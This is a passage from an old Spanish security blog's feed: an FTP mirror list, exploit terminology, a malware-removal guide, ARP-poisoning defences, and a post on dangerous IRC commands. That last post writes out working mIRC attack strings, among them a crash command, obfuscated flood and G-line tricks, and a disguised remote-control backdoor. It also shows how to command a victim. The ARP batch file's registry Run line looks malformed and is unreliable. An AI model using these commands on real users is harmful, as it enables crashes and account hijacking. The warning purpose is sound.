/&gt;ftp.pwr.wroc.pl&lt;br /&gt; &lt;br /&gt;Polonia&lt;br /&gt;ftp.rediris.es     Red Académica española. Espejo de Simtel. + de 12 gigas de material&lt;br /&gt;ftp.ruuc.net.au&lt;br /&gt; &lt;br /&gt;Es lento&lt;br /&gt;ftp.simtel.net     SIM TEL NET (Walnut Creek). 2000 usuarios simultáneos. La máquina es un P6 a 200MHz con 512MB de memoria y 124GB de disco. Sólo algo más potente que el mío :-((&lt;br /&gt;ftp.sura.net     Un gran almacen para PC y Unix&lt;br /&gt;ftp.switch.ch     Red Académica Suiza. Un montón de cosas. Mirror de casi todo&lt;br /&gt;ftp.tecmedia.co.cr   &lt;br /&gt;Costa Rica&lt;br /&gt;ftp.tsc.uvigo.es     Universidade de Vigo - (Indexado en Archie)&lt;br /&gt;ftp.tuke.sk&lt;br /&gt; &lt;br /&gt;Eslovaquia&lt;br /&gt;ftp.ua.es     Centro de Proceso de Datos - Universitat d'Alacant (indexado en archie)&lt;br /&gt;ftp.uam.es     Universidad Autónoma de Madrid&lt;br /&gt;ftp.uco.es   &lt;br /&gt;ftp.udc.es&lt;br /&gt; &lt;br /&gt;Universidad de A Coruña. Serv. Pack 1 Win 95, Clientes Archie.&lt;br /&gt;ftp.ulpgc.es&lt;br /&gt;   U. Las Palmas de G. Canaria&lt;br /&gt;ftp.uma.es     Universidad de Málaga - (Indexado en Archie)&lt;br /&gt;ftp.uniovi.es     Universidad de Oviedo. Muy bueno&lt;br /&gt;ftp://cert.unisa.it     Italia&lt;br /&gt;ftp.unizar.es&lt;br /&gt; &lt;br /&gt;ftp.upc.es     Serveis Informtics - Universitat Politécnica de Catalunya&lt;br /&gt;ftp.usal.es&lt;br /&gt; &lt;br /&gt;Universidad de Salamanca&lt;br /&gt;ftp.uv.es&lt;br /&gt; &lt;br /&gt;Universidad de Valencia&lt;br /&gt;ftp.vse.cz     Checoslovaquia&lt;br /&gt;ftp.vein.hu   &lt;br /&gt;&lt;br /&gt;Hungría. Antivirus&lt;br /&gt;ftp.arrakis.es     Mirror de Tucows. Sólo admite 6 usuarios "no arrakianos" simultáneos.&lt;br /&gt;ftp.cdrom.com                            &lt;br /&gt; &lt;br /&gt;Wallnut Creek CD-ROM "home site"&lt;br /&gt;ftp.doc.ic.ac.uk     Mirror entre otros de Microsoft. SunSITE Northern Europe. Está en el departamento de computadores del Imperial College, Londres, y corre en un Sun Ultra Enterprise 6000: 6 CPUs, 3 Gig ram, 200 GB disco (Sun Microsystems). 200 usuarios&lt;br /&gt;ftp.funet.fi     Espejo europeo de Intel&lt;br /&gt;ftp.nctuccca.edu.tw     CCCA (Taiwan) Espejo de cerca de 100 sitios. + 14Gb capacidad.&lt;br /&gt;ftp.oak.oakland.edu     Universidad de Oakland. Espejo de Sim Tel&lt;br /&gt;ftp.rediris.es     Red Académica española. Espejo de Simtel + 12 Gigas&lt;br /&gt;ftp.switch.ch     Red Académica Suiza. Un montón de cosas. Mirror de casi todo&lt;br /&gt;ftp.uni-paderborn.de     Univ. of Paderborn (Alemania) : CICA, SimTel, Demos, Linux, OS/2, Amiga&lt;br /&gt;ftp.wuarchive.wustl.edu     Univ. Washington. SimTel, CICA, Grav. Ultrasound.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4066715375017413993?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4066715375017413993/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/servidores-ftp-publicos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4066715375017413993'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4066715375017413993'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/servidores-ftp-publicos.html' title='Servidores ftp Publicos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3532085610075854636</id><published>2009-11-21T13:21:00.000+01:00</published><updated>2009-11-21T13:22:06.374+01:00</updated><title type='text'>Diferencia de un XPLOIT y un EXPLOIT</title><content type='html'>Que es Exploit y Xploit y diferencias&lt;br /&gt;&lt;br /&gt;Vamos a ver las definiciones de estos dos terminos que se confunden muy seguido ya que su pronunciacion y escritura son similares.&lt;br /&gt;Primero planteo este tema para que dejen de preguntar e insistir con los exploit que en fin lo llaman como al fake mail.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: pink;"&gt;EXPLOIT&lt;/span&gt;&lt;br /&gt;Exploit (viene de to exploit - aprovechar) - código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios. software.&lt;br /&gt;&lt;br /&gt;Un buen número de exploits tienen su origen en un conjunto de fallos similares. Algunos de los grupos de vulnerabilidades más conocidos son:&lt;br /&gt;&lt;br /&gt;Vulnerabilidades de desbordamiento de pila o buffer overflow.&lt;br /&gt;Vulnerabilidades de condición de carrera (Race condition).&lt;br /&gt;Vulnerabilidades de error de formato de cadena (format string bugs).&lt;br /&gt;Vulnerabilidades de Cross Site Scripting (XSS).&lt;br /&gt;Vulnerabilidades de inyección SQL (SQL injection).&lt;br /&gt;Vulnerabilidades de inyeccion de caraceres (CRLF).&lt;br /&gt;Obtenido de "&lt;a href="http://es.wikipedia.org/wiki/Exploit" target="_blank"&gt;http://es.wikipedia.org/wiki/Exploit&lt;/a&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="color: pink;"&gt;XPLOIT&lt;/span&gt;&lt;br /&gt;Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.&lt;br /&gt;&lt;br /&gt;Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;fuente: infiernohacker&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3532085610075854636?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3532085610075854636/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/diferencia-de-un-xploit-y-un-exploit.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3532085610075854636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3532085610075854636'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/diferencia-de-un-xploit-y-un-exploit.html' title='Diferencia de un XPLOIT y un EXPLOIT'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-8964750956628231992</id><published>2009-11-19T19:13:00.000+01:00</published><updated>2009-11-19T19:17:20.030+01:00</updated><title type='text'>CÓMO ELIMINAR ARCHIVOS MALICIOSOS QUE SE RESISTEN, USANDO KILLBOX</title><content type='html'>&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; Hay ocasiones en que después de analizar el PC con el antivirus residente o con algún antivirus on-line se nos indica que ha encontrado algún archivo malicioso y no ha podido eliminarlo.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;2.&lt;/strong&gt; El siguiente paso sería localizar ese archivo. Nos dirigimos a la ruta Completa del archivo que nos ha indicado el antivirus y aquél no aparece.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; Tendríamos que proceder a activar la opción “Mostrar todos los archivos y carpetas ocultos”:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Ver archivos ocultos en Windows XP:&lt;/strong&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;br /&gt;- Haz doble-clic en “Mi PC”. – Herramientas/Opciones de carpeta. – Selecciona la pestaña “Ver”. – Desmarcar “Ocultar extensiones de archivo para tipos de archivo conocidos” – En “Archivos ocultos” selecciona “Mostrar todos archivos y carpetas ocultos”. – Aplicar y Aceptar.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mFMUaCwtbag/SwWLEjNUEXI/AAAAAAAAADE/wIu-F0nq7zQ/s1600/35069167jc0.jpg"&gt;&lt;img style="cursor: pointer; width: 278px; height: 284px;" src="http://2.bp.blogspot.com/_mFMUaCwtbag/SwWLEjNUEXI/AAAAAAAAADE/wIu-F0nq7zQ/s320/35069167jc0.jpg" alt="" id="BLOGGER_PHOTO_ID_5405879838014968178" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;4.&lt;/strong&gt; Una vez realizado este paso, buscamos el archivo malicioso y lo eliminamos.&lt;/p&gt; &lt;p&gt;&lt;span style="color:red;"&gt;*Si el archivo no se dejase eliminar, debes reiniciar el PC en “modo seguro” (a&lt;br /&gt;prueba de errores) para intentar eliminarlo.&lt;br /&gt;*Si el archivo malicioso tampoco aparece después de haber activado la opción&lt;br /&gt;“Mostrar todos los archivos y carpetas ocultos”, debemos usar el programa&lt;br /&gt;KillBox para “sacar a flote” ese archivo.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;5.&lt;/strong&gt; Descarga el programa &lt;a rel="nofollow" target="_blank" href="http://www.downloads.subratam.org/KillBox.exe"&gt;&lt;strong&gt;&lt;em&gt;&lt;u&gt;KillBox&lt;/u&gt;&lt;/em&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Ejecuta KillBox y selecciona&lt;strong&gt; “Delete on reboot”:&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/SwWLTX2DVhI/AAAAAAAAADM/c6KfgqmHKRs/s1600/35069167jc0.jpg"&gt;&lt;img style="cursor: pointer; width: 315px; height: 278px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/SwWLTX2DVhI/AAAAAAAAADM/c6KfgqmHKRs/s320/35069167jc0.jpg" alt="" id="BLOGGER_PHOTO_ID_5405880092662650386" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;-En el recuadro que dice &lt;strong&gt;“Full path of file to delete”&lt;/strong&gt;, teclea la ruta completa&lt;br /&gt;del archivo que deseas eliminar:&lt;/p&gt; &lt;p class="bbimg"&gt;&lt;img style="width: 344px; height: 301px;" src="http://img45.imageshack.us/img45/7797/3xa3.jpg" alt="imagen externa" border="0" /&gt;&lt;/p&gt; &lt;p&gt;&lt;span style="color: red;"&gt;Ej: Si queremos eliminar MSAOL32dll.exe, teclea la ruta donde se encuentra el&lt;br /&gt;archivo C:\WINDOWS\System32\MSAOL32dll.exe&lt;br /&gt;- Después de colocar la ruta del archivo, haz clic sobre el circulo rojo con un&lt;br /&gt;X blanca.&lt;br /&gt;- Cuando pregunte “Reboot now” “Reiniciar ahora”, haz clic en “Sí”.&lt;/span&gt;&lt;/p&gt; &lt;p class="bbimg"&gt;&lt;img style="width: 355px; height: 310px;" src="http://img105.imageshack.us/img105/6375/4um0.jpg" alt="imagen externa" border="0" /&gt;&lt;/p&gt; &lt;strong&gt;-Si no es el único archivo a eliminar, selecciona “NO” (que no reinicie), cuando&lt;br /&gt;hayas tecleado la ruta del último archivo que deseas eliminar, haz clic en “Sí”&lt;br /&gt;para reiniciar el PC.&lt;br /&gt;&lt;br /&gt;fuente:lestathijackthis&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-8964750956628231992?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/8964750956628231992/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-eliminar-archivos-maliciosos-que.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8964750956628231992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8964750956628231992'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-eliminar-archivos-maliciosos-que.html' title='CÓMO ELIMINAR ARCHIVOS MALICIOSOS QUE SE RESISTEN, USANDO KILLBOX'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mFMUaCwtbag/SwWLEjNUEXI/AAAAAAAAADE/wIu-F0nq7zQ/s72-c/35069167jc0.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6899952150279283994</id><published>2009-11-18T12:42:00.000+01:00</published><updated>2009-11-18T14:07:54.260+01:00</updated><title type='text'>Como Evitar Ataques de Envenenamiento ARP</title><content type='html'>Aqui explicare de que manera nos podemos defender de este tipo de ataque&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: 1.3em;font-size:12pt;" &gt;Conocimiento Previo:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://en.wikipedia.org/wiki/Address_Resolution_Protocol" target="_blank"&gt;ARP en Wikipedia&lt;/a&gt;&lt;br /&gt;&lt;a href="http://icaix.com/tutoriales/ARP.htm" target="_blank"&gt;Video Tutorial de ARP&lt;/a&gt;&lt;br /&gt;&lt;a href="http://foro.portalhacker.net/index.php/topic,70067.0.html" target="_blank"&gt;Â¿Que es un Ataque Envenenamiento ARP?&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:12pt;" &gt;&lt;span style="color:orange;"&gt;Herramientas:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://arpwatch-ng.softonic.com/linux" target="_blank"&gt;ARP Watch (linux)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.secudos.com/public/AG-240.pdf" target="_blank"&gt;ARP guard&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:12pt;" &gt;&lt;span style="color:orange;"&gt;Video Tutorial:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://icaix.com/tutoriales/arpwatch.htm" target="_blank"&gt;Defenderse de Ataques de envenenamiento ARP&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: 1.3em;font-size:14pt;" &gt;&lt;b&gt;Maneras de defenderse del ataque:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: 1.3em;font-size:13pt;" &gt;&lt;b&gt;1-ARP Watch (linux)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;ARP Watch es una herramienta para sistemas linux que nos puede ayudar a detectar el envenenamiento ARP en nuestro sistema operativo.&lt;br /&gt;con esta herramienta podemos comprovar la correspondencia entre pares (IP/MAC). en el caso en que se este provocando un ataque ARP Watch manda un correo de notificacion a la cuenta administrador del sistema.&lt;br /&gt;Tambien puede detectar nuevos host en la red&lt;br /&gt;(si alguien falsifica su IP/MAC para hacer un ataque de envenenamiento ARP)&lt;br /&gt;&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: 1.3em;font-size:13pt;" &gt;&lt;b&gt;2-ARP Guard (hardware)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;ARP guard es un hardware que nos permite reconocer las amenazas&lt;br /&gt;de un posible ataque de enevenenamiento ARP.&lt;br /&gt;esta constantemente observando los paquetes ARP&lt;br /&gt;y si detecta alguna anomalia manda un mensaje a el administrador de la red&lt;br /&gt;con el origen del ataque.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:orange;"&gt;&lt;span style="line-height: 1.3em;font-size:15pt;" &gt;&lt;b&gt;3-Asignacion Estatica en la tabla de entradas ARP&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;El ataque de envenenamiento ARP consiste en modificar las entradas en las tablas ARP. el sistema es vulnerable por que puede moverse. entonces sencillamente dejemoslo fijo y que nadie lo pueda mover =D&lt;br /&gt;&lt;br /&gt;Bien esto es un poco mas complicado, asi que pongan atencion.&lt;br /&gt;existen dos maneras de aÃ±adir una entrada a una tabla ARP.&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:12pt;" &gt;&lt;span style="color:orange;"&gt;1Âº Forma Automatica&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Es lo que hace nuestro PC todo el tiempo sin que nos demos cuenta&lt;br /&gt;&lt;br /&gt;&lt;span style="line-height: 1.3em;font-size:12pt;" &gt;&lt;span style="color:orange;"&gt;2Âº Forma Manual&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;De la manera manual nosotros podemos dejar inmutable incluso apagado el sistema de dicha entrada en la tabla ARP.&lt;br /&gt;&lt;br /&gt;Para aÃ±adir una ARP en un sistema esta es la Sintaxis:&lt;br /&gt;&lt;img style="width: 425px; height: 81px;" src="http://img169.imageshack.us/img169/2350/arpstf7.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;b&gt;[Direccion IP]&lt;/b&gt; --&gt; Direccion IP del Host&lt;br /&gt;&lt;b&gt;[Direccion MAC]&lt;/b&gt; --&gt; Direccion MAC del Host&lt;br /&gt;&lt;br /&gt;De esta manera las Direcciones MAC quedan Grabadas.&lt;br /&gt;y por mucho que el PC atacante intente hacer un ataque envenenamiento ARP No lo podria haber logrado =D&lt;br /&gt;Y si ubiesemos tenido el sofware ARP Watch (en linux)&lt;br /&gt;podriamos haber sabido quien fue el que intento hacer el ataque.&lt;br /&gt;&lt;br /&gt;Eso si esto tiene Una Falla, al apagar el PC las tablas ARP se encontraran vacias al volver a prender el PC, y eso nos vuelve vulnerables al ataque.&lt;br /&gt;pero sencillamente debemos de crear un .bat que haga que se inicie con windows siempre y nunca mas nos preocuparemos de estos ataques ^^&lt;br /&gt;&lt;div class="codeheader"&gt;Código:&lt;/div&gt;&lt;div class="code"&gt;&lt;pre style="margin-top: 0pt; display: inline;"&gt;@echo off&lt;br /&gt;arp -s [Direccion IP del Host] [Direccion MAC del Host]&lt;br /&gt;reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v virus.bat/t reg_sz /d C:\windows\system32 /f&lt;br /&gt;exit&lt;/pre&gt;&lt;/div&gt;&lt;br /&gt;Saludos! y espero que les guste&lt;br /&gt;&lt;br /&gt;fuent: foro.infiernohacker.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6899952150279283994?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6899952150279283994/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-evitar-ataques-de-envenenamiento.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6899952150279283994'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6899952150279283994'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/11/como-evitar-ataques-de-envenenamiento.html' title='Como Evitar Ataques de Envenenamiento ARP'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2257170650132153536</id><published>2009-11-13T19:38:00.000+01:00</published><updated>2009-11-13T19:46:22.587+01:00</updated><title type='text'>COMANDOS PELIGROSOS:</title><content type='html'>Este  post va dedicado a los irc (chat)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Los podemos dividir en 2 categorías: Comandos que escribe el atacante y comandos que escribe la víctima. Contra los primeros sólo podemos protegernos manteniendo actualizado nuestro sistema. Contra los segundos, lo tenemos mucho más sencillo: No escribir jamás ningún comando cuya acción desconozcamos.&lt;br /&gt;&lt;br /&gt;a) Comandos que escribe el atacante:&lt;br /&gt;&lt;br /&gt;**** Con/Con **** -= Pantallazo Azul =-&lt;br /&gt;&lt;br /&gt;- Este comando aprovecha un fallo del kernel de windows, el cual, produce el comúnmente conocido como " Pantallazo Azul " y nos hace reiniciar el ordenador, o meterle tres patadas ( sobre gustos no hay nada escrito ).&lt;br /&gt;- Este es el comando para un canal entero:&lt;br /&gt;&lt;br /&gt;/ctcp #canal sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3&lt;br /&gt;&lt;br /&gt;- Este es para una sola persona:&lt;br /&gt;&lt;br /&gt;/ctcp #canal nick sound \IFS$HLP$\IFS$HLP$\IFS$HLP$.mp3&lt;br /&gt;&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;&lt;br /&gt;-Si usamos ircap podemos bajarnos también el parche contra el con/con de la página:&lt;br /&gt;&lt;br /&gt;http://www.ircap.net&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**** Sacar IP's **** -= !seen nick =-&lt;br /&gt;&lt;br /&gt;-Da pocos resultados, pero a veces funciona y da la ip o dns del nick víctima.&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;Desactivando en nuestro script el comando !seen. Para ello escribimos:&lt;br /&gt;/disable #seen&lt;br /&gt;&lt;br /&gt;b) Comandos que escribe la víctima:&lt;br /&gt;&lt;br /&gt;**** Timer **** -= Soy gay! =-&lt;br /&gt;&lt;br /&gt;-Comando poco peligroso, pero sí molesto y pesado. Aparte de ponernos en ridículo, nos puede hacer desconectarnos del irc por excess flood.&lt;br /&gt;&lt;br /&gt;- Lo que hace al ejecutarse es activar un timer o temporizador que repite en bucle (siempre lo mismo). El más típico es tunick soy gay, (aunque el texto puede ser cualquiera) en todos los canales en los que estes.&lt;br /&gt;&lt;br /&gt;-Algunas de las variantes de éste comando son las siguientes:&lt;br /&gt;&lt;br /&gt;//t $+ $chr(105) $+ $chr(109) $+ er 0 1 $chr(97) $+ $chr(109) $+ S $+ $chr(103) $chr(115)) $+ o $+ $chr(121) $chr(103) $+ $chr(97) $+ $chr(121)&lt;br /&gt;&lt;br /&gt;/timer 0 1 //$left(ameipmask,3) $left(esirc,2) $left(Generated,1) $+ $right(getipay,2)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-Resultado del comando:&lt;br /&gt;&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;tunick&gt; soy gay&lt;br /&gt;&lt;br /&gt;(Así hasta que te caes por excess flood).&lt;br /&gt;&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;&lt;br /&gt;-La mejor forma es evidente, no escribiendo comandos cuya acción desconozcamos.&lt;br /&gt;&lt;br /&gt;-Si ya lo hemos escrito, tenemos que fijarnos en lo que pone al ejecutar la sentencia:&lt;br /&gt;&lt;br /&gt;Si pone: * Timer loquesea activated&lt;br /&gt;&lt;br /&gt;Tenemos que escribir: /timerloquesea off (timerloquesea todo junto).&lt;br /&gt;&lt;br /&gt;Por ejemplo, Si pone * Timer 1 activated&lt;br /&gt;&lt;br /&gt;Tenemos que escribir: /timer1 off&lt;br /&gt;&lt;br /&gt;-Si no nos da tiempo a pararlo, sólo hay que cerrar el script, y luego volverlo a abrir, entrar a los canales en los que estabamos y explicar quee tu hermano pequeño o amigo te pilló el teclado y lo puso (casi nuca te creerán :DDDD )&lt;br /&gt;&lt;br /&gt;**** _antispam **** -= Ataca _antispam !! =-&lt;br /&gt;&lt;br /&gt;- Este comando hace enfadar mucho al bot que se encarga de la publicidad no permitida en las redes llamado _antispam.&lt;br /&gt;&lt;br /&gt;-Su modus operandi es muy simple, al poner el comando en pleno canal, donde se encuentre el bot, todos esos caracteres se decodifican (traducen al cristiano) y forman la frase: www.sexoduro.com, con lo cual el bot te engancha y te pone un g-line, sin que puedas volver a conectarte a esa red en un buen ratito.&lt;br /&gt;&lt;br /&gt;//$decode(bXNnIF9hbnRpc3BhbSB3d3cuc2V4b2R1cm8uY29t,m)&lt;br /&gt;&lt;br /&gt;- Existen más variaciones de éste código, que nos hacen decir: www.jodiendo.com , www.sexogratis.com, etc... no os fieis y pongais cosas que no sabeis para que son; os pueden estar tomando el pelo.&lt;br /&gt;&lt;br /&gt;**** Ctcp's **** -= Remote Control =-&lt;br /&gt;&lt;br /&gt;- Este comando es igual que un troyano, pero en version IRC. Permite a cualquiera manejarte a voluntad como si fueras un bot, pudiendo hablar por ti, enviar dccs, banear o dar @ a alguien, etc...&lt;br /&gt;&lt;br /&gt;- El modo de infeccion es el mismo que los anteriores. Te llega un individuo y te camela para que pongas el comando con fines diversos como veremos a continuación.&lt;br /&gt;&lt;br /&gt;- El principio del comando es el señuelo o engaño, puesto que puede ser muy distinto, según nos digan que lo pongamos para obtener @ en todos los canales, para que no nos puedan banear, etc, etc.&lt;br /&gt;&lt;br /&gt;- //echo -a opme #canal tunick &lt;--- esto es el principio del comando que como vereis se puede cambiar para persuadiros de que lo pongais, diciendo, en este caso que obtendreis @ en un determinado canal . Si lo poneis vereis quee solo decis: opme #canal tunick ,donde #canal puede ser ummmm #Malaga y tunick pepe. Seria asi el comienzo del comando ---&gt; opme #Malaga pepe ..............&lt;br /&gt;&lt;br /&gt;-Este es el comando completo (ya hemos dicho que el comienzo puede variar).&lt;br /&gt;&lt;br /&gt;//echo -a opme #canal nick | $mid(au-writer,4,5) $mid(badabc,3,3) $+ $chr(46) $+ $mid(allintxt,6,3) $mid(CTC-org,1,3) $+ $chr(80) $str(*:,3) $chr(36) $+ $mid(1-2=3,1,2) $chr(124) $mid(scotty-haltty,8,4) | $chr(46) $+ $mid(loader-client,1,4) $mid(q-rstu,2,3) $mid(badabc,3,3) $+ $chr(46) $+ $mid(alltxt,4,3)&lt;br /&gt;&lt;br /&gt;- Como podeis observar es extremadamente largo, pero se ha abreviado y reducido a multitud de tamaños.&lt;br /&gt;&lt;br /&gt;- ¿Como se controla a un infectado ?&lt;br /&gt;&lt;br /&gt;-Mediante ctcp's: /ctcp nickvictima //msg #canal mensaje&lt;br /&gt;&lt;br /&gt;Traducción: /ctcp pepe //msg #malaga eres mi esclavo :DDDD&lt;br /&gt;&lt;br /&gt;La opcion msg se puede cambiar por deop nickx (quita la @ al nickx), op nickx (da @ al nickx) etc...&lt;br /&gt;&lt;br /&gt;- ¿Como saber quien me controla ?&lt;br /&gt;&lt;br /&gt;-Fácil, nos vamos a estado y miramos los ctcps puesto que te controlan mediante ellos.&lt;br /&gt;&lt;br /&gt;Veriamos: Ctcp nickmalvado y la orden que nos ha enviado hacer.&lt;br /&gt;&lt;br /&gt;-¿Cómo evitarlo?&lt;br /&gt;&lt;br /&gt;- Si “por casualidad” llegaseis a poner ese comando, el modo de desinfección es fácil. Al poner el comando se crea un documento con el nombre dab.txt en la carpeta C:\mIRC (esto varia segun los scripts), en cuyo interior se puede ver algo asi:&lt;br /&gt;&lt;br /&gt;CTCP *:*:*: $1- | halt&lt;br 